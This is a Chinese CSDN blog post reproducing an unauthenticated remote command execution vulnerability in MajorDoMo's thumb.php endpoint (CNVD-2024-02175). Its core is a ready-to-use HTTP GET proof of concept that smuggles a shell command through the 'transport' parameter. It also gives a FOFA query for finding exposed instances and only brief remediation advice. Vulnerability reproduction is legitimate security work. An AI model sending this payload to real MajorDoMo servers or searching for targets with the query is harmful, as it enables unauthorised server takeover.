MajorDoMo thumb.php 未授权RCE漏洞复现(CNVD-2024-02175)

已于 2024-04-16 09:02:07 修改
阅读量753 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-04-16 09:02:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137808307
版权

0x01 产品简介

MajorDoMo是MajorDoMo社区的一个开源DIY智能家居自动化平台。

0x02 漏洞概述

MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。

0x03 影响范围

MajorDoMo < 0662e5e

0x04 复现环境

FOFA:app="MajordomoSL"

0x05 漏洞复现

PoC

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Tomcat漏洞分析利用
weixin_43047908的博客
08-19 1741
目录前言环境搭建漏洞复现CVE-2017-12615CVE-2020-1938 前言 Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Ja
基于CentOS7的Matomo网站统计分析工具
huiskai的博客
01-17 1810
Matomo的前身是Piwik,是一套基于 PHP5+MySQL 技术构建的开源网站访问统计系统。Matomo可以给你详细的统计信息,比如网页浏览人数,访问最多的页面,搜索引擎关键词等等流量分析功能。此外,它还采用了插件扩展及开放 API 架构,可以让用户根据自已的实际需求创建更多的功能。Matomo让网站拥有自己的流量统计工具成为可能。
MajorDoMo thumb.php 授权远程代码执行漏洞
最新发布
weixin_43689708的博客
04-22 685
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!MajorDoMo是MajorDoMo社区的一个开源DIY智能家居自动化平台。
基于matomo实现业务数据埋点采集上报
有梦想的咸鱼前端
10-14 1564
matomo是一款Google-analytics数据埋点采集上报的平替方案,可保护您的数据和客户的隐私;
01、版本管理-GIT
快把钟哥带走
06-12 166
一、版本控制 版本控制,通过文档控制记录各个模块的改动,并给每次改动添加序号,用于存储、追踪目录和文件的修改历史。 二、版本控制软件 GIT 分布式版本控制系统 SVN 集中式版本控制系统 三、git安装 1、git下载 - https://git-scm.com/downloads - https://pan.baidu.com/s/1kU5OCOB#list/path=%2...
majordomo-esp8266_wifiot:支持wifi-iot.com设备
03-06
压缩包中的文件名为“majordomo-esp8266_wifiot-master”,这通常表示这是一个Git仓库的主分支(master)克隆,其中包含了完整的项目源代码和相关资源。这可能包括ESP8266的固件代码、majordomo的PHP服务器端代码、...
majordomo:家庭自动化平台
05-14
什么是MajorDoMo MajorDoMo(主要家庭模块)是一个开源DIY智能家庭自动化平台,旨在用于多协议和多服务环境。 它基于Web技术堆栈,可随时交付给任何现代设备。 使用用于设置自动化规则和脚本的OOP范例进行配置时,它...
majordomo-xiaomimiio:小米智能家居miIO设备集成
05-01
小米miIO 该模块旨在将MajorDoMo与小米Mihome生态系统的Wi-Fi设备集成在一起,并使用miIO协议进行交互。 miIO是具有加密功能的小米专有网络协议,小米生态系统中的wifi设备通过该协议与智能手机上的Mihome应用进行...
majordomo-google_tts
04-29
【标题】"majordomo-google_tts"是一个专门为MajorDoMo智能家居系统设计的插件,它允许用户利用谷歌文本转语音(Text-to-Speech, TTS)服务,而无需使用Google的官方API。这意味着该插件可能通过某种方式规避了对API...
majordomo-keenetic
04-07
"majordomo-keenetic" 是一个专为与Keenetic路由器进行交互而设计的模块,主要用于管理和控制网络设备。在IT领域,这样的模块通常由开发者或爱好者创建,以扩展设备的功能或提供更便捷的控制方式。Keenetic路由器是...
从一个Laravel SQL注入漏洞开始的Bug Bounty之旅
离别歌
08-30 2676
事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在授权测试过程。本文提到的漏洞《Cachet SQL注入漏洞(CVE-2021-39165)》已经修复,也请读者勿使用该...
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1738
进行漏洞复现,读取敏感文件
matomo的安装使用和体验
weixin_34391854的博客
03-12 3865
概述 matomo的前身是piwik,是一个强大的网站流量分析网站,我使用它的原因就是因为我的网站原先使用的是百度统计,但是百度统计最近貌似不稳定了,所以我想自己搭建一个这样的分析平台来分析自己的博客流量,还有最关键的是matomo是有手机客户端的,所以我可以随时在我的手机上查看我的网站访问情况 安装 下面说下安装首先是下载安装包wget https:...
mysql统计人数_网站访问统计系统 Matomo,基于 PHP5+MySQL,前身是Piwik
weixin_39525307的博客
12-11 173
Matomo 的前身是 Piwik,是一套基于 PHP5+MySQL 技术构建的开源网站访问统计系统。Matomo 可以给你详细的统计信息,比如网页浏览人数,访问最多的页面,搜索引擎关键词等等流量分析功能。此外,它还采用了插件扩展及开放 API 架构,可以让用户根据自已的实际需求创建更多的功能。它具有以下特征:– 免费开源软件(php+mysql)– 与google分析,百度分析相比,可以让你10...
matomo安装及使用
.net小猿的专栏
11-01 8391
适用版本 Windows 7/8/10 Matomo 3.6.1 IIS10 AngularCli 6.0.1 所需组件 PHP &gt;= 5.5.9 该方案中使用PHP7.2.11,下载地址http://php.net/downloads.php#v7.2.11 Matomo3.6.1,下载地址https://matomo.org/download/ 安装及配置 安装php...
Magento 2.2 SQL注入漏洞
weixin_51387754的博客
12-02 1536
漏洞简介 agento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。 其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞漏洞复现 使用vulhub 执行如下命令启动Magento 2.2.7: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到Magento的安装页面。安装M
前端脚本错误监控及跟踪解决方案——Matomo
chenggedian7759的博客
08-15 855
网站访问统计 Matomo简介 Matomo 的前身是 Piwik,是一套基于 PHP+MySQL 技术构建的开源网站访问统计系统。Matomo 可以给你详细的统计信息,比如网页浏览人数,访问最多的页面,搜索引擎关键词等等流量分析功能。此外,它还采用了插件扩展及开放 API 架构,可以让用户根...
第一天写博客matomo
mhuahua的博客
04-21 1587
第一天写属于自己的博客,真不敢相信这一天来了。目前在学习matomo工具,创建一个博客来作为监测的网站吧。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值